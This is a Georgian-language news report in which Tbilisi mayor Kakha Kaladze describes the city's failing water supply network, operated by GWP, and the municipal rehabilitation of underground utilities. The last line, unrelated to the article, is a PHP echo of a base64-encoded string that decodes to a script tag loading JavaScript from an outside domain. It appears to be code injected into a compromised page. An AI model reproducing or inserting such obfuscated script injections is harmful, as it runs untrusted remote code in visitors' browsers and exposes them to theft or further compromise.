celsiusi
ავერსი საქკაბელი
თბილისში სერიოზული პრობლემაა წყალმომარაგება, არსებული ქსელი კრიტიკას ვერ უძლებს, – ამის შესახებ თბილისის მერმა, კახა კალაძემ ჟურნალისტებს ვაზისუბანში წყალმომარაგების შეფერხებასთან დაკავშირებით დასმულ კითხვაზე განუცხადა.
 
„არა მარტო ვაზისუბანში, ზოგადად თბილისში სერიოზული პრობლემაა წყალმომარაგება. არსებული კომპანია – „ჯორჯიან ვოთერ ენდ ფაუერი“(GWP) რომელიც ოპერირებს, არსებული ქსელი, კრიტიკას ვერ უძლებს, არის უმძიმეს მდგომარეობაში, ძალიან ხშირია ავარიები. შესაძლოა ყოველდღიურადაც ხდება კონკრეტულ ქუჩებზე ავარიები. მიუხედავად იმისა, რომ ხორციელდება სარეაბილიტაციო სამუშაოები, იმდენად მასშტაბურია ავარიები, რომ კრიტიკას ვერ უძლებს. შესაბამისად, ისიც შემთხვევითი არ არის, რომ ჩვენ ვახორციელებთ სარეაბილიტაციო სამუშაოებს ყველგან“, – განაცხადა კახა კალაძემ.
 
მისი თქმით, დედაქალაქში მიწისქვეშა კომუნიკაციების მოწესრიგების თვალსაზრისით წარსულში ძირეული ცვლილებები არ განხორციელებულა.
 
„პირველი, რასაც ვაკეთებთ, არის მიწისქვეშა კომუნიკაციების მოწესრიგება, რადგან წინა წლების განმავლობაში არავის არასდროს მიუქცევია ყურადღება ამისთვის. ეს არის თბილისის შექმნიდან არსებული კომუნიკაციები, რომლებიც არ შეცვლილა. შეიძლება, ფრაგმენტული ცვლილებები ხორციელდებოდა, თუმცა ძირეული ცვლილებები არ განხორციელებულა. შესაბამისად, ნაწილობრივ იქ, სადაც მერია შედის ინფრასტრუქტურული სამუშაოებისთვის, ჩვენ გავაკეთებთ ყველაფერს, მოვაწესრიგებთ. რა თქმა უნდა, კომპანიას აქვს ვალდებულება, მოახდინოს რეაგირება და გამოასწოროს“, – აღნიშნა კახა კალაძემ.
 
 
 
 
807
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");